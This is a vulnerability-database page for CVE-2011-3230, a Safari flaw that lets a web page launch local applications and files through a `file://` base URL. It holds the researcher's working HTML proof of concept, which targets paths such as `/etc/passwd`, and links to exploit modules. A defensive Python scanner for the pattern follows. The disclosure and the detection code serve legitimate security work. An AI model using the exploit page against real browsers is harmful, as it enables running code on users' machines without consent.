Apple Safari Arbitrary Code Execution

15 Oct 2011 00:00:00 | Reported by Aaron Sigel | Type: packetstorm | Source: packetstormsecurity.com

Apple Safari Arbitrary Code Execution CVE-2011-3230 vulnerabilit

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Apple Safari file:// Arbitrary Code Execution | 16 Oct 2011 00:00 | zdt |
| Tenable Nessus | Safari < 5.1.1 Multiple Vulnerabilities | 12 Oct 2011 00:00 | nessus |
| Tenable Nessus | Safari < 5.1.1 Multiple Vulnerabilities | 12 Oct 2011 00:00 | nessus |
| Tenable Nessus | Mac OS X : Apple Safari < 5.1.1 | 13 Oct 2011 00:00 | nessus |
| Circl | CVE-2011-3230 | 17 Oct 2011 00:00 | circl |
| Check Point Advisories | Apple Safari file URL Arbitrary Code Execution (CVE-2011-3230) | 13 Oct 2011 00:00 | checkpoint_advisories |
| CVE | CVE-2011-3230 | 14 Oct 2011 10:00 | cve |
| Cvelist | CVE-2011-3230 | 14 Oct 2011 10:00 | cvelist |
| Exploit DB | Apple Safari - 'file://' Arbitrary Code Execution (Metasploit) | 17 Oct 2011 00:00 | exploitdb |
| Metasploit | Apple Safari file:// Arbitrary Code Execution | 16 Oct 2011 19:31 | metasploit |
`CVE: CVE-2011-3230  
Found By: Aaron Sigel of vtty.com  
  
There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" URL to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the HTML provided below.  
  
  
  
  
<html>  
<head>  
<base href="file://">  
<script>  
function DoIt() {  
alert(document.getElementById("cmdToRun").value);  
document.location=document.getElementById("cmdToRun").value;  
}  
</script>  
</head>  
<body>  
<select id="cmdToRun">  
<option value="/usr/sbin/netstat">Launch /usr/sbin/netstat</option>  
<option value="/etc/passwd">Launch /etc/passwd</option>  
<option value="/Applications/Utilities/Bluetooth File Exchange.app">  
Launch Bluetooth File Exchange.app</option>  
</select>  
<br />  
<input type=button value="Launch" onclick="DoIt()">  
<br />  
</body>  
</html>  
  
  
Apple's advisory: http://support.apple.com/kb/HT5000  
`
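
A defender-side check for the pattern the PoC relies on, added here as an example and not part of the original advisory: it scans HTML fetched over http(s) for a `<base>` element with a `file:` scheme and lists the values that resolve to `file:` URLs under it. The names `scan` and `FileBaseScanner`, the host `example.test`, and the treatment of absolute-path `<option>` values as navigation candidates are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Attributes whose value a browser resolves against the document base URL.
URL_ATTRS = {"href", "src", "action"}

# Constructed sample mirroring the structure of the page's PoC.
SAMPLE = ('<html><head><base href="file://"></head><body>'
          '<select><option value="/usr/sbin/netstat">x</option></select>'
          '<a href="about.html">about</a></body></html>')


class FileBaseScanner(HTMLParser):
    """Collects the first <base href> and every value that may be navigated to."""

    def __init__(self):
        super().__init__()
        self.base = None       # browsers honour only the first <base href>
        self.candidates = []   # (tag, raw value) pairs, resolved after parsing

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base":
            if self.base is None and attrs.get("href"):
                self.base = attrs["href"].strip()
            return
        for name in URL_ATTRS.intersection(attrs):
            if attrs[name]:
                self.candidates.append((tag, attrs[name]))
        # Heuristic (assumption): a script may feed <option value="/path">
        # to document.location, so absolute-path values are candidates too.
        if tag == "option" and (attrs.get("value") or "").startswith("/"):
            self.candidates.append((tag, attrs["value"]))


def scan(html, page_url):
    """Return (kind, url) findings for a page that was served from page_url."""
    if urlsplit(page_url).scheme not in ("http", "https"):
        return []              # only remotely served content is in scope
    scanner = FileBaseScanner()
    scanner.feed(html)
    base = scanner.base or page_url
    findings = []
    if urlsplit(base).scheme.lower() == "file":
        findings.append(("file-base", base))
    for tag, value in scanner.candidates:
        resolved = urljoin(base, value)
        if urlsplit(resolved).scheme.lower() == "file":
            findings.append((f"file-target:{tag}", resolved))
    return findings
```

A `file-base` finding on remotely served content is the strong signal; the `file-target` entries show which relative values the base rewrites into local paths.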

Vulners AI Score: 0.1 (Low risk) | EPSS: 0.64547